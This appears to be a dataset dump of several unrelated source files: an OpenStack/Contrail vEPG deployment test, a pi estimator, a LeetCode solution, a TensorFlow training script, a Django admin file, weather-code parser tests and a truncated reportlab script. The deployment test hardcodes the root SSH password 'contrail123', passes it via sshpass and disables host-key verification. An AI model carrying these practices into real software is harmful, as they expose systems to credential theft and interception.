cls.nova_hosts)\n else:\n cls.agg_id['kernel-computes'] = cls.connections.orch.create_agg(\n 'kernel-computes',\n 'kernel-computes')\n cls.agg_id['dpdk-computes'] = cls.connections.orch.create_agg(\n 'dpdk-computes',\n 'dpdk-computes')\n host_list = cls.connections.orch.get_hosts()\n cls.dpdk_hosts = [cls.inputs.host_data[host]['fqname'] \\\n for host in cls.inputs.dpdk_ips]\n cls.nova_hosts = copy.deepcopy(host_list)\n for host in host_list:\n if host in cls.dpdk_hosts:\n cls.nova_hosts.remove(host)\n cls.connections.orch.add_host_to_agg(cls.agg_id['kernel-computes'],\n cls.nova_hosts) \n cls.connections.orch.add_host_to_agg(cls.agg_id['dpdk-computes'],\n cls.dpdk_hosts) \n\n #Floating IP creation.\n if cls.fip == True:\n #Create IPAM\n cls.ipam_obj = IPAMFixture(connections=cls.connections,\n name='public-net')\n cls.ipam_obj.setUp()\n cls.ipam_obj.verify_on_setup()\n\n #Create VN\n cls.pub_vn_fixture = VNFixture(\n project_name=cls.project.project_name,\n connections=cls.connections,\n vn_name='public-net',\n inputs=cls.inputs,\n subnets=[cls.inputs.fip_pool],\n ipam_fq_name=cls.ipam_obj.fq_name)\n cls.pub_vn_fixture.setUp()\n cls.pub_vn_fixture.verify_on_setup()\n\n #Create FIP pool\n cls.fip_fixture = FloatingIPFixture(\n project_name=cls.project.project_name,\n connections=cls.connections,\n inputs=cls.inputs,\n pool_name='public-net',\n vn_id=cls.pub_vn_fixture.vn_id)\n cls.fip_fixture.setUp()\n cls.fip_fixture.verify_on_setup()\n\n #Create FIP stack\n cls.fip_template_file=cls.deploy_path+\"template/vepg_floating.yaml\"\n with open(cls.fip_template_file, 'r') as fd:\n cls.fip_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n cls.fip_stack = HeatStackFixture(\n connections=cls.connections,\n stack_name=cls.connections.project_name+'_fip',\n template=cls.fip_template)\n cls.fip_stack.setUp()\n\n #Create FIP assignment env parameter for vepg creation.\n cls.fip_env_file=cls.deploy_path+\"env/vepg_b2b_main.yaml\"\n with open(cls.fip_env_file, 'r') as fd:\n cls.fip_env = yaml.load(fd, Loader=yaml.FullLoader)\n\n for fip_dict in cls.fip_stack.heat_client_obj.stacks.get(\n cls.fip_stack.stack_name).outputs:\n if 'floatip' in fip_dict['output_key']:\n if cls.fip_env['parameters'] is not None:\n cls.fip_env['parameters'].update(\n {fip_dict['output_key']:fip_dict['output_value']})\n else:\n cls.fip_env['parameters'] = \\\n {fip_dict['output_key']:fip_dict['output_value']}\n\n #Create VEPG.\n if cls.fip == True:\n cls.vepg_template_file=cls.deploy_path+\"template/vepg_b2b_main.yaml\"\n with open(cls.vepg_template_file, 'r') as fd:\n cls.vepg_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n for each_resource in cls.vepg_template['resources']:\n if 'personality' in cls.vepg_template['resources']\\\n [each_resource]['properties']:\n inject_file='/config/junos-config/configuration.txt'\n fp1=open(cls.vepg_template['resources'][each_resource]\\\n ['properties']['personality'][inject_file]\\\n ['get_file'], 'r')\n data=fp1.read()\n cls.vepg_template['resources'][each_resource]['properties']\\\n ['personality'][inject_file]=data\n fp1.close()\n if 'commit_config' in cls.vepg_template['resources']\\\n [each_resource]['properties']\\\n ['personality'].keys()[0]:\n inject_file='/config/junos-config/commit_config.sh'\n fp2=open(cls.vepg_template['resources'][each_resource]\\\n ['properties']['personality'][inject_file]\\\n ['get_file'], 'r')\n data2=fp2.read()\n cls.vepg_template['resources'][each_resource]\\\n ['properties']['personality'][inject_file]=data2\n fp2.close()\n\n cls.vepg_stack = HeatStackFixture(\n connections=cls.connections,\n stack_name=cls.connections.project_name+'_vepg',\n template=cls.vepg_template, env=cls.fip_env,\n timeout_mins=15)\n cls.vepg_stack.setUp()\n else:\n cls.vepg_template_file=cls.deploy_path+\"template/vepg_b2b_main.yaml\"\n with open(cls.vepg_template_file, 'r') as fd:\n cls.vepg_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n for each_resource in cls.vepg_template['resources']:\n if 'personality' in cls.vepg_template['resources']\\\n [each_resource]['properties']:\n inject_file='/config/junos-config/configuration.txt'\n fp1=open(cls.vepg_template['resources'][each_resource]\\\n ['properties']['personality'][inject_file]\\\n ['get_file'], 'r')\n data=fp1.read()\n cls.vepg_template['resources'][each_resource]['properties']\\\n ['personality'][inject_file]=data\n fp1.close()\n \n cls.vepg_stack = HeatStackFixture(\n connections=cls.connections,\n stack_name=cls.connections.project_name+'_vepg',\n template=cls.vepg_template,\n timeout_mins=15)\n cls.vepg_stack.setUp()\n\n # Get VM details and setup vsrx\n op = cls.vepg_stack.heat_client_obj.stacks.get(\n cls.vepg_stack.stack_name).outputs\n vsfo_fix = dict()\n for output in op:\n key = output['output_key']\n for i in range(1,cls.NB_VSFO_CP_NODES+1):\n vsfo = \"vsfo_%s_id\" %(i)\n if key == vsfo:\n vsfo_uuid = output['output_value']\n vsfo_fix[i] = VMFixture(connections=cls.connections,uuid = vsfo_uuid, image_name = 'VSFO-CP-IMAGE')\n vsfo_fix[i].read()\n vsfo_fix[i].verify_on_setup()\n i = i + 1\n\n for i in range(cls.NB_VSFO_CP_NODES+1 ,cls.NB_VSFO_CP_NODES + cls.NB_VSFO_UP_NODES+1):\n vsfo = \"vsfo_%s_id\" %(i)\n if key == vsfo:\n vsfo_uuid = output['output_value']\n vsfo_fix[i] = VMFixture(connections=cls.connections,uuid = vsfo_uuid, image_name = 'VSFO-UP-IMAGE')\n vsfo_fix[i].read()\n vsfo_fix[i].verify_on_setup()\n i = i+1\n\n if key == \"vrp_31_id\":\n vrp31_uuid = output['output_value']\n vrp_31 = VMFixture(connections=cls.connections,uuid = vrp31_uuid, image_name = 'VRP-IMAGE')\n vrp_31.read()\n vrp_31.verify_on_setup()\n\n if key == \"vrp_32_id\":\n vrp32_uuid = output['output_value']\n vrp_32 = VMFixture(connections=cls.connections,uuid = vrp32_uuid, image_name = 'VRP-IMAGE')\n vrp_32.read()\n vrp_32.verify_on_setup()\n\n cls.vsfo_fix = vsfo_fix\n cls.vrp_31 = vrp_31\n cls.vrp_32 = vrp_32\n\n # Copy scale config files and apply config if scaled setup.\n if 'orange' in cls.deploy_path:\n for i in range(1, cls.NB_VSFO_CP_NODES + cls.NB_VSFO_UP_NODES+1):\n cls.vsfo_fix[i].vm_password='contrail123'\n file_name=cls.deploy_path+'vsrx_config/'+\\\n cls.vsfo_fix[i].vm_name.split('B2B-')[1].lower()+\\\n '_config.txt'\n cmd='sshpass -p \\'%s\\'' %(cls.vsfo_fix[i].vm_password)\n cmd=cmd+' scp -o StrictHostKeyChecking=no %s heat-admin@%s:/tmp/'\\\n %(file_name, cls.vsfo_fix[i].vm_node_ip)\n op=os.system(cmd)\n if op is not 0:\n cls.logger.error(\"Failed to copy vsrx config file %s to %s\"\\\n %(file_name, cls.vsfo_fix[i].vm_node_ip))\n file_name='/tmp/'+cls.vsfo_fix[i].vm_name.split('B2B-')[1].lower()+\\\n '_config.txt'\n cmd='sshpass -p \\'%s\\' ssh -o StrictHostKeyChecking=no heat-admin@%s \\\n sshpass -p \\'%s\\' scp -o StrictHostKeyChecking=no -o \\\n UserKnownHostsFile=/dev/null %s root@%s:/tmp/'\\\n %(cls.vsfo_fix[i].vm_password, cls.vsfo_fix[i].vm_node_ip,\n cls.vsfo_fix[i].vm_password, file_name,\n cls.vsfo_fix[i].local_ip)\n op=os.system(cmd)\n if op is not 0:\n cls.logger.error(\"Failed to copy vsrx config file %s to %s\"\\\n %(file_name, cls.vsfo_fix[i].local_ip))\n cmd='sshpass -p \\'%s\\' ssh -o StrictHostKeyChecking=no heat-admin@%s \\\n sshpass -p \\'%s\\' ssh -o StrictHostKeyChecking=no -o \\\n UserKnownHostsFile=/dev/null \\\n root@%s \\'sh /config/junos-config/commit_config.sh\\' '\\\n %(cls.vsfo_fix[i].vm_password, cls.vsfo_fix[i].vm_node_ip,\n cls.vsfo_fix[i].vm_password, cls.vsfo_fix[i].local_ip)\n op=os.popen(cmd).read()\n if 'commit complete' not in op:\n cls.logger.error(\"Failed to commit vsrx config on %s\"\\\n %(cls.vsfo_fix[i].vm_name))\n\n # Create BGPaaS stacks.\n #Define variables for template file, env file, bgpaas stack and\n #bfd_health_check_uuid\n cls.bgpaas_stack_status=True\n cls.bgpaas_env_f=glob.glob(cls.deploy_path+'env/VEPG_BGP*')\n cls.bgpaas_template_f=[]\n cls.bgpaas_env={}\n cls.bgpaas_template={}\n cls.bfd_hc_uuid=None\n cls.bgpaas_stacks={}\n #Get bfd_health_check_uuid from the vepg stack created earlier.\n for list_item in cls.vepg_stack.heat_client_obj.stacks.get(\n cls.vepg_stack.stack_name).outputs:\n if list_item['output_key'] == 'bfd_health_check':\n cls.bfd_hc_uuid=list_item['output_value']\n #Fail if no bfd_health_check_uuid received.\n if not cls.bfd_hc_uuid:\n cls.logger.error(\"No BFD Health check uuid found !!!\")\n cls.bgpaas_stack_status=False\n return False\n #Create BGPaaS stack for each template file using corresponding env file\n #from env dir.\n for each_bef in cls.bgpaas_env_f:\n with open(each_bef, 'r') as fd:\n cls.bgpaas_env[each_bef] = yaml.load(fd, Loader=yaml.FullLoader)\n t1=re.findall(\"VSFO\\d\", each_bef)\n t2=re.findall(\"EXT\\d\", each_bef)\n #for each of the env file create vsfo_key to get vsfo uuid from\n #vepg stack.\n vsfo_key=t1[0].lower()[:4]+'_'+t1[0].lower()[4:]+'_'+\\\n t2[0].lower()[:3]+'_'+t2[0].lower()[3:]\n vsfo_uuid=None\n for list_item in cls.vepg_stack.heat_client_obj.stacks.get(\n cls.vepg_stack.stack_name).outputs:\n if list_item['output_key'] == vsfo_key:\n #get vsfo uuid to be updated in env file\n vsfo_uuid=list_item['output_value']\n break\n vsfo_env_key=None\n #get the vsfo key name from env file that needs to be updated with\n #the uuid.\n for key, value in cls.bgpaas_env[each_bef]['parameters'].items():\n if 'vsfo' in key:\n vsfo_env_key=key\n #update the bfd_health_check_uuid in env file.\n cls.bgpaas_env[each_bef]['parameters']['bfd_health_check_uuid']=\\\n cls.bfd_hc_uuid\n #update the vsfo_env_key in env file.\n cls.bgpaas_env[each_bef]['parameters'][vsfo_env_key]=vsfo_uuid\n #create string to find relevant template files for this\n #environment file.\n t=t1[0].lower()+'_'+t2[0].lower()\n cls.bgpaas_template_f=glob.glob(cls.deploy_path+'template/'+t+'*')\n #Create BGPaaS stack for each template file for this env.\n for each_btf in cls.bgpaas_template_f:\n #generate stack name based on env file name and number of APN's.\n stack_name=re.findall('VEPG\\w*',each_bef)[0]+\\\n re.findall('apn_\\d*_\\d*',each_btf)[0][3:]\n with open(each_btf, 'r') as fd:\n cls.bgpaas_template[each_btf] = yaml.load(fd,\n Loader=yaml.FullLoader)\n cls.bgpaas_stacks[stack_name] = HeatStackFixture(\n connections=cls.connections,\n stack_name=stack_name,\n template=cls.bgpaas_template[each_btf],\n env=cls.bgpaas_env[each_bef],\n timeout_mins=10)\n cls.bgpaas_stacks[stack_name].setUp()\n\n #end setup_vepg\n\n @classmethod\n def delete_vepg(cls):\n for each_stack in cls.bgpaas_stacks:\n cls.bgpaas_stacks[each_stack].cleanUp()\n\n #Delete vepg Stack\n cls.vepg_stack.cleanUp()\n\n #Delete fip stack, fip pool VN and ipam.\n cls.fip_stack.cleanUp()\n cls.fip_fixture.cleanUp()\n cls.pub_vn_fixture.cleanUp()\n cls.ipam_obj.cleanUp()\n\n #Delete AZ\n cls.connections.orch.del_host_from_agg(cls.agg_id['kernel-computes'],\n cls.nova_hosts)\n cls.connections.orch.delete_agg(cls.agg_id['kernel-computes'])\n if 'dpdk_hosts' in dir(cls):\n cls.connections.orch.del_host_from_agg(cls.agg_id['dpdk-computes'],\n cls.dpdk_hosts)\n cls.connections.orch.delete_agg(cls.agg_id['dpdk-computes'])\n\n #Delete Flavor Stack\n cls.flavors_stack.cleanUp()\n\n #Delete Quota Stack\n cls.quota_stack.cleanUp()\n return True\n #end delete_vepg\n\n @preposttest_wrapper\n def test_orange_deploy(self):\n ''' Dummy test routine to be changed in later commits.\n '''\n result = True\n self.logger.info(\"Running test orange deployment.\")\n self.logger.info(self.connections.project_name)\n self.logger.info(self.connections.username)\n\n return True\n # end test_orange_deploy\n\n @preposttest_wrapper\n def test_02_interface_check(self):\n ''' CEM-16881\n Check virtual instances are properly started with network connectivity.\n '''\n\n ips_list=[]\n vm_fix_list=[self.vrp_31, self.vrp_32]\n\n #get list of all vm fixtures\n for i in range(1, self.NB_VSFO_CP_NODES + self.NB_VSFO_UP_NODES+1):\n vm_fix_list.append(self.vsfo_fix[i])\n\n #get ge-0/0/0.0 i/f ip of each vm\n for i in range(0, self.NB_VSFO_CP_NODES + self.NB_VSFO_UP_NODES+2):\n cmd = \"sshpass -p contrail123 ssh -o StrictHostKeyChecking=no -o \\\n UserKnownHostsFile=/dev/null -J \\\n \\\"%s@%s\\\" -o GlobalKnownHostsFile=/dev/null root@%s \\\n \\\"ifconfig | grep 192.3.1 | cut -d ' ' -f 4 | cut -d = -f 2\\\"\"\\\n %(self.inputs.host_data[vm_fix_list[i].vm_node_ip]['username'] ,\n vm_fix_list[i].vm_node_ip,vm_fix_list[i].local_ip)\n output = os.popen(cmd).read()\n output1=output.replace(\"\\n\",\"\")\n ips_list.append(output1)\n\n #each vm should ping every other adjacent vm (ex: 4 vms, 6 ping sessions)\n for i in range(0, self.NB_VSFO_CP_NODES + self.NB_VSFO_UP_NODES+2):\n #loop to perform ping\n for j in range(i+1, self.NB_VSFO_CP_NODES + self.NB_VSFO_UP_NODES+2):\n cmd = \"sshpass -p contrail123 ssh -o StrictHostKeyChecking=no -o \\\n UserKnownHostsFile=/dev/null -J \\\n \\\"%s@%s\\\" -o GlobalKnownHostsFile=/dev/null \\\n root@%s \\\"ping -c 3 %s\\\"\"\\\n %(self.inputs.host_data[vm_fix_list[i].vm_node_ip]['username'] ,\n vm_fix_list[i].vm_node_ip,vm_fix_list[i].local_ip,ips_list[j])\n output = os.popen(cmd).read()\n print(output)\n if '0% packet loss' not in output:\n self.logger.error(\" Ping from %s to %s FAILED!!\",\n vm_fix_list[i].vm_name,vm_fix_list[j].vm_name)\n else:\n self.logger.info(\" Ping from %s to %s PASSED!!\",\n vm_fix_list[i].vm_name,vm_fix_list[j].vm_name)\n\n return True\n # end test_02_interface_check\n#end class OrangeSolutionTest\n","sub_path":"serial_scripts/solution/test_orange_solution.py","file_name":"test_orange_solution.py","file_ext":"py","file_size_in_byte":22895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"7653585","text":"\"\"\"圆周率计算\"\"\"\nfrom random import random\nfrom time import perf_counter\n\n\"\"\"近似计算\"\"\"\n# 公式1/pow(16,k)*(4/(8*k+1)-2/(8*k+4)-1/(8*k+5)-1/(8*k+6))\npi = 0\nN = 100\nfor k in range(N):\n pi += 1 / pow(16, k) * (4 / (8 * k + 1) - 2 / (8 * k + 4) - 1 / (8 * k + 5) - 1 / (8 * k + 6))\nprint(\"{}\".format(pi))\n\n# 蒙特卡罗(蒙眼戳飞镖)\nDARTS = 1000 * 1000\nhits = 0.0\nstart = perf_counter()\nfor i in range(1, DARTS + 1):\n x, y = random(), random()\n dist = pow(x ** 2 + y ** 2, 0.5)\n if dist <= 1.0:\n hits = hits + 1\npi = 4 * (hits / DARTS)\nprint(\"{}\".format(pi))\nprint(\"{}\".format(perf_counter() - start))\n","sub_path":"L4/5_PI.py","file_name":"5_PI.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22591826","text":"\"\"\"\nhttps://leetcode.com/problems/binary-tree-paths/\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n def __str__(self):\n return str(self.val)\n\nclass Solution:\n \"\"\"\n Recursive\n \"\"\"\n def binaryTreePaths(self, node):\n if not node:\n return []\n\n if not (node.left or node.right):\n return [str(node.val)]\n\n left_paths = self.binaryTreePaths(node.left)\n right_paths = self.binaryTreePaths(node.right)\n\n left_paths = [str(node.val) + '->' + path for path in left_paths]\n right_paths = [str(node.val) + '->' + path for path in right_paths]\n\n return left_paths + right_paths\n\n\nnode1 = TreeNode(1)\nnode2 = TreeNode(2)\nnode3 = TreeNode(3)\nnode5 = TreeNode(5)\n\nnode1.left = node2\nnode1.right = node3\nnode2.right = node5\n\n\nprint(Solution().binaryTreePaths(node1))\n\n\n","sub_path":"leetcode/binary-tree-paths/binary-tree-paths2.py","file_name":"binary-tree-paths2.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"147883070","text":"import tensorflow as tf\nimport numpy as np\nfrom dhbc_slim import DHBC_FCN\nfrom losses import softmax_cross_entropy\nimport config\nimport random\nimport cv2 as cv\nimport os\nimport time\nimport tensorflow.contrib.slim as slim\n\nproject_path = 'D:\\\\Project\\\\DHBC\\\\'\nstart_step = 0\n\n# train\nlearning_rate = 0.0001\ntraining_iters = 200000\nbatch_size = 128\n\n# log and display\nlogs_dir = project_path + 'log-sas\\\\'\ncheckpoints_dir = logs_dir + 'checkpoints\\\\'\ncheckpoint_step = 1000\n\ndisplay_dir = logs_dir + 'display\\\\'\ndisplay_step = 20\n\nrandom.seed()\n\n# prepare color transition\ncolor2int_dense = {(0, 0, 0): 0}\nint2color_dense = {0: (0, 0, 0)}\nfor i in range(config.num_dense_color):\n color = config.int2color(i + 1, config.num_dense_color + 1)\n color = (int(255 * color[0]), int(255 * color[1]), int(255 * color[2]))\n int2color_dense[i + 1] = color\n color2int_dense[color] = i + 1\n \ndef random_batch(model_idx, segmentation_idx, batch_size):\n batch_depth = np.zeros([batch_size, 21, 21, 1], dtype=np.uint8)\n batch_label_dense = np.zeros([batch_size, 1, 1], dtype=np.int64)\n \n view_cands = random.sample([(i, j) for i in range(config.num_mesh[model_idx]) for j in range(144)], batch_size)\n batch = 0\n for view in view_cands:\n depth_view_path = config.get_depth_view_path(model_idx, view[0], view[1])\n depth_view = cv.imread(depth_view_path, -1)\n while 1:\n x, y = random.randint(0, 512 - 21), random.randint(0, 512 - 21)\n if depth_view[x + 10, y + 10] > 0:\n break\n batch_depth[batch, :, :, 0] = depth_view[x:x+21, y:y+21]\n \n segmentation_view_path = config.get_segmentation_view_path(model_idx, view[0], segmentation_idx, view[1])\n segmentation_view = cv.imread(segmentation_view_path, -1)\n x, y = x + 10, y + 10\n color = (segmentation_view[x, y, 0], segmentation_view[x, y, 1], segmentation_view[x, y, 2])\n batch_label_dense[batch, 0, 0] = color2int_dense[color] - 1\n batch += 1\n return batch_depth, batch_label_dense\n \ndef timeit(t=None):\n if t:\n print(\"Time elapse: \" + str(time.time() - t))\n return time.time()\n\nif __name__ == '__main__':\n \n with tf.device('/gpu:0'):\n tf.reset_default_graph()\n \n x_depth = tf.placeholder(tf.float32, [None, 21, 21, 1])\n y_label_dense = tf.placeholder(tf.int64, [None, 1, 1])\n \n t = timeit()\n print(\"Set up inference model...\")\n \n model = DHBC_FCN()\n model.inference_sas(x_depth)\n \n t = timeit(t)\n print(\"Set up cost and optimizer...\")\n \n costs = {}\n optimizers = {}\n accuracies = {}\n for model_idx in range(1):\n for segmentation_idx in range(config.num_seg):\n branch = model.get_branch_name(model_idx, segmentation_idx)\n costs[branch] = tf.losses.sparse_softmax_cross_entropy(labels=y_label_dense, logits=model.preds[branch], loss_collection=None)\n optimizers[branch] = tf.train.AdamOptimizer().minimize(costs[branch])\n accuracies[branch] = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(model.preds[branch], axis=-1), y_label_dense), tf.float32))\n \n saver = tf.train.Saver(max_to_keep=10)\n \n with tf.Session() as sess:\n t = timeit(t)\n print(\"Initialize variables...\")\n sess.run(tf.global_variables_initializer())\n \n ckpt_path = checkpoints_dir + 'model-' + str(start_step)\n if os.path.exists(ckpt_path + '.meta'):\n t = timeit(t)\n print(\"Restore model at step {0}...\".format(start_step))\n saver.restore(sess, ckpt_path)\n step = start_step + 1\n else:\n print(\"No snapshot at step {0}, training from scratch...\".format(start_step))\n step = 1\n \n t = timeit(t)\n while step * batch_size < training_iters:\n model_idx = random.randint(0, 0)\n segmentation_idx = random.randint(0, config.num_seg - 1)\n branch = model.get_branch_name(model_idx, segmentation_idx) \n batch_depth, batch_label_dense = random_batch(model_idx, segmentation_idx, batch_size)\n _, loss, acc= sess.run([optimizers[branch], costs[branch], accuracies[branch]], feed_dict={x_depth: batch_depth, y_label_dense: batch_label_dense})\n print(branch + \" Step \" + str(step) + \", Loss= {:.6f}\".format(loss) + \", Accuracy= {:.6f}%\".format(acc * 100))\n \n #if step % display_step == 0:\n #pred = sess.run(tf.nn.softmax(model.pred), feed_dict={x_depth: batch_depth, y_label_dense: batch_label_dense})\n #display(step, pred, batch_label_dense)\n \n if step % checkpoint_step == 0:\n saver.save(sess, checkpoints_dir + 'model', step)\n print(\"Save model at step {0}.\".format(step))\n step += 1\n print(\"Optimization Finished!\")","sub_path":"train_sas.py","file_name":"train_sas.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68321909","text":"def f(s,t):\n if s!=0:\n for i in [int(x) for x in list(str(s))]:\n t[i]+=1\n \n \nt=[0]*10 \nline=input().strip()\nstart=int(line.split()[0])\nend=int(line.split()[1])\nfor i in range(start,end+1):\n f(i,t)\nprint(' '.join([str(x) for x in t]),end='')\n\n","sub_path":"Code/CodeRecords/2892/60788/261374.py","file_name":"261374.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"255905907","text":"from django.contrib.auth.models import User\nfrom models import Aanvraag\nfrom django.contrib import admin\n\n\nclass AanvraagAdmin(admin.ModelAdmin):\n\n list_display = ('user', 'titel', 'begindatum', 'total_costs')\n\n fieldsets = [\n (None, {'fields': ['user', 'titel', 'omschrijving']}),\n ('Data', {'fields': ['begindatum', 'einddatum']}),\n ('Budget', {'fields': ['kosten_budget', 'uren_budget']}),\n ('Uiteindelijk', {'fields': ['kosten_actual', 'uren_actual']}),\n ('Admin', {'fields': ['opmerking_admin', 'aanvraag_status']}),\n\n]\n\nadmin.site.register(Aanvraag, AanvraagAdmin)\n","sub_path":"aanvragen/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"194124527","text":"import unittest\nimport datetime\n\nimport pytz\nfrom pyiem.nws import ugc\n\nSTR1 = \"DCZ001-170200-\"\nSTR2 = \"DCZ001-MDZ004>007-009>011-013-014-016>018-VAZ036>042-050>057-170200-\"\n\n\nclass TestObservation(unittest.TestCase):\n\n def test_totextstr(self):\n \"\"\" See if we can generate a proper string from a UGCS \"\"\"\n ugcs = [ugc.UGC(\"DC\", \"Z\", \"001\"), ugc.UGC(\"IA\", \"C\", \"001\"),\n ugc.UGC(\"IA\", \"C\", \"002\")]\n self.assertEquals(ugc.ugcs_to_text(ugcs),\n \"((DCZ001)) [DC] and ((IAC001)), ((IAC002)) [IA]\")\n\n def test_str1(self):\n \"\"\" check ugc.parse of STR1 parsing \"\"\"\n valid = datetime.datetime(2008, 12, 17, 3, 0)\n valid = valid.replace(tzinfo=pytz.timezone('UTC'))\n (ugcs, expire) = ugc.parse(STR1, valid)\n\n expire_answer = valid.replace(hour=2)\n ugcs_answer = [ugc.UGC(\"DC\", \"Z\", \"001\"), ]\n\n self.assertEqual(ugcs, ugcs_answer)\n self.assertEqual(expire, expire_answer)\n\n def test_str2(self):\n \"\"\" check ugc.parse of STR2 parsing \"\"\"\n valid = datetime.datetime(2008, 12, 17, 3, 0)\n valid = valid.replace(tzinfo=pytz.timezone('UTC'))\n (ugcs, expire) = ugc.parse(STR2, valid)\n\n expire_answer = valid.replace(hour=2)\n ugcs_answer = [ugc.UGC(\"DC\", \"Z\", \"001\"), ugc.UGC(\"MD\", \"Z\", \"004\"),\n ugc.UGC(\"MD\", \"Z\", \"005\"), ugc.UGC(\"MD\", \"Z\", \"006\"),\n ugc.UGC(\"MD\", \"Z\", \"007\"), ugc.UGC(\"MD\", \"Z\", \"009\"),\n ugc.UGC(\"MD\", \"Z\", \"010\"), ugc.UGC(\"MD\", \"Z\", \"011\"),\n ugc.UGC(\"MD\", \"Z\", \"013\"), ugc.UGC(\"MD\", \"Z\", \"014\"),\n ugc.UGC(\"MD\", \"Z\", \"016\"), ugc.UGC(\"MD\", \"Z\", \"017\"),\n ugc.UGC(\"MD\", \"Z\", \"018\"), ugc.UGC(\"VA\", \"Z\", \"036\"),\n ugc.UGC(\"VA\", \"Z\", \"037\"), ugc.UGC(\"VA\", \"Z\", \"038\"),\n ugc.UGC(\"VA\", \"Z\", \"039\"), ugc.UGC(\"VA\", \"Z\", \"040\"),\n ugc.UGC(\"VA\", \"Z\", \"041\"), ugc.UGC(\"VA\", \"Z\", \"042\"),\n ugc.UGC(\"VA\", \"Z\", \"050\"), ugc.UGC(\"VA\", \"Z\", \"051\"),\n ugc.UGC(\"VA\", \"Z\", \"052\"), ugc.UGC(\"VA\", \"Z\", \"053\"),\n ugc.UGC(\"VA\", \"Z\", \"054\"), ugc.UGC(\"VA\", \"Z\", \"055\"),\n ugc.UGC(\"VA\", \"Z\", \"056\"), ugc.UGC(\"VA\", \"Z\", \"057\")]\n\n self.assertEqual(ugcs, ugcs_answer)\n self.assertEqual(expire, expire_answer)\n","sub_path":"pyiem/nws/tests/test_ugc.py","file_name":"test_ugc.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633962151","text":"from traceback import print_last\nimport os, utils, pyprind\nfrom pandas import DataFrame, concat, pivot_table, read_excel\nimport pandas\nfrom copy import deepcopy, copy\nimport numpy as np\nimport spold2_reader as spold2\nfrom reportlab.platypus import Paragraph, Spacer, Table, Image, NextPageTemplate, FrameBreak\nfrom reportlab.platypus.tables import TableStyle\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib import colors\nfrom reportlab.rl_config import defaultPageSize\nfrom reportlab.lib.units import inch\nfrom reportlab.platypus.doctemplate import PageTemplate, BaseDocTemplate\nfrom reportlab.platypus.frames import Frame\nimport re\nimport time\necoinvent_red = '#B01C18'\n\nPAGE_HEIGHT=defaultPageSize[1]\nPAGE_WIDTH=defaultPageSize[0]\nMARGIN = (PAGE_WIDTH - 7*inch) / 2. - 6\nstyles = getSampleStyleSheet()\nheader_style = deepcopy(styles[\"Normal\"])\nheader_style.fontSize = 8\n\njustified = deepcopy(styles[\"Normal\"])\njustified.alignment = 4\n\nback = deepcopy(styles[\"Normal\"])\nback.alignment = 3\nback.fontSize = 4\n\nbullet = deepcopy(justified)\n\nno_info_style = deepcopy(styles[\"Normal\"])\nno_info_style.alignment = 4\nno_info_style.fontName = 'Helvetica-Oblique'\nno_info_style.textColor = colors.grey\nno_info_style.fontSize = 8\nno_info = Paragraph('No data.', no_info_style)\n\nsmall_table_style = deepcopy(styles[\"Normal\"])\nsmall_table_style.fontSize = 10\n\nlarge_table_style = deepcopy(styles[\"Normal\"])\n\ntitle_style = deepcopy(styles[\"Normal\"])\ntitle_style.fontSize = 12\ntitle_style_TOC = deepcopy(styles[\"Normal\"])\ntitle_style_TOC.fontSize = 12\n\nsmall = deepcopy(styles[\"Normal\"])\nsmall.fontSize = 8\n\nsmall_justified = deepcopy(styles[\"Normal\"])\nsmall_justified.fontSize = 8\nsmall_justified.alignment = 4\n\nsmall_justified_contrib = deepcopy(styles[\"Normal\"])\nsmall_justified_contrib.fontSize = 7\nsmall_justified_contrib.alignment = 4\nsmall_justified_contrib.fontName = 'Helvetica-Oblique'\nsmall_justified_contrib.leading = 6\n\nexplanation_style = deepcopy(styles[\"Normal\"])\nexplanation_style.fontSize = 6\nexplanation_style.fontName = 'Helvetica-Oblique'\nexplanation_style.leading = 6\n\nheader_style_right = deepcopy(header_style)\nheader_style_right.alignment = 3\n\nheader_style_center = deepcopy(header_style)\nheader_style_center.alignment = 1\n\nthick_line = 1.\nthin_line = .25\n\ninter_par_dist = 0.15*inch\nsmall_spacer = 0.05*inch\nmax_comment_length = 1000\nall_table_style = [('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('INNERGRID', (0,0), (-1,-1), thin_line, colors.black),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ]\nv_header = deepcopy(all_table_style)\nv_header.extend([\n ('BACKGROUND',(0,0),(0,-1), colors.lightgrey), \n ('ALIGN',(0,0),(0,-1),'RIGHT'),\n ('ALIGN',(1,1),(1,-1),'LEFT'),\n ('INNERGRID', (0,0), (-1,-1), thin_line, colors.white), \n (('LINEBELOW', (1,0), (-1,-2), .25, colors.black))\n ])\nh_header = deepcopy(all_table_style)\nh_header.extend([\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('ALIGN',(0,0),(-1,0),'CENTRE'),\n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('LINEABOVE', (0,1), (-1,1), .25, colors.white)\n ])\nh_header2 = [('SPAN',(0,0),(-1,0)), #merge the first line for the header inner table\n ('LEFTPADDING', (0,0), (-1,0), 0), #remove padding for the inner table to be seemless\n ('RIGHTPADDING', (0,0), (-1,-1), 0), \n ('TOPPADDING', (0,0), (-1,-1), 